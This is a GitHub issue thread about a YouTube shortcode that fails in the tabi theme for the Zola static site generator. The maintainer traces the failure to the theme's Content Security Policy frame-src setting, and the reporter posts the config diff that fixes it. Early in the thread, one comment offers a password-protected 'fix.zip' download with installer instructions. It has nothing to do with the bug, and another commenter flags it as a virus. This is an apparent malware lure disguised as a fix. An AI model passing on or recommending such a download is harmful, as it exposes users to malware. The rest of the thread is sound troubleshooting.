### ISSUE TITLE
youtube shortcode is not working.

### ISSUE THREAD

**Issue by soumendrak** [welpo/tabi#371]
# Bug Report

I have used an YT shortcode which was working fine withe Apollo theme. However, in tabi I am facing issue.

```js
<div class="youtube-embed">
    <iframe width="100%" height="600" src="https://www.youtube.com/embed/{{id}}" frameborder="0"
        allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture"
        allowfullscreen></iframe>
</div>
```
I have added this file, `youtube.html` under [templates/shortcode](https://github.com/soumendrak/website-v2/blob/main/templates/shortcodes/youtube.html)

## Environment

Zola version: 0.19.1
tabi version or commit: 2.13.0

## Expected Behavior
Youtube video should have come as an embedding.

## Current Behavior
Tell us what happens instead of the expected behavior.
![image](https://github.com/user-attachments/assets/ad22c8f1-c33c-4f5c-8307-74b8d3d4d94a)
[link](https://www.soumendrak.com/blog/odias-in-aiml-conference-2023/)

## Step to Reproduce
1. Create the youtube shortcode html file.
2. Use it in any markdown post file
```md
Live streaming links of the conference:
{{ youtube(id="GPkWL-9akQc") }}
```
3. Build and serve the site

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by soumendrak** [comment]
> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."

@PiaoR 
What will it do?

**Comment by tankeco** [comment]
> > Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."
> 
> @PiaoR What will it do?

it's virus, don't download it

**Comment by welpo** [comment]
Hi Soumendra!

Did you allow youtube connections through the [CSP](https://welpo.github.io/tabi/blog/security/)?

**Comment by soumendrak** [comment]
Thanks @welpo for the precise solution. After making the following changes, it fixed the issue.

```diff
allowed_domains = [
    { directive = "font-src", domains = ["'self'", "data:"] },
    { directive = "img-src", domains = ["'self'", "https://*", "data:"] },
    { directive = "media-src", domains = ["'self'", "https://cdn.jsdelivr.net/"] },
    { directive = "script-src", domains = ["'self'"] },
    { directive = "style-src", domains = ["'self'"] },
-    { directive = "frame-src", domains = ["player.vimeo.com", "https://www.youtube-nocookie.com"] },
+    { directive = "frame-src", domains = ["player.vimeo.com", "https://www.youtube.com"] },
]
```

**Comment by soumendrak** [comment]
@welpo Thanks for this snippet. Is there any reason why Zola removed this shortcode?

**Comment by welpo** [comment]
They were removed here: https://github.com/getzola/zola/commit/a56e4248e12cd0e958e5fbb48c039c85a989d238

Reasoning:

> The youtube one for example had been broken for a long time and no one really noticed. It's better to not have anything than something not tested/doesn't work. Most of them were only a couple of lines anyway.

I might add Vimeo/YouTube shortcodes to tabi and mention the CSP changes necessary to make them work on the documentation.
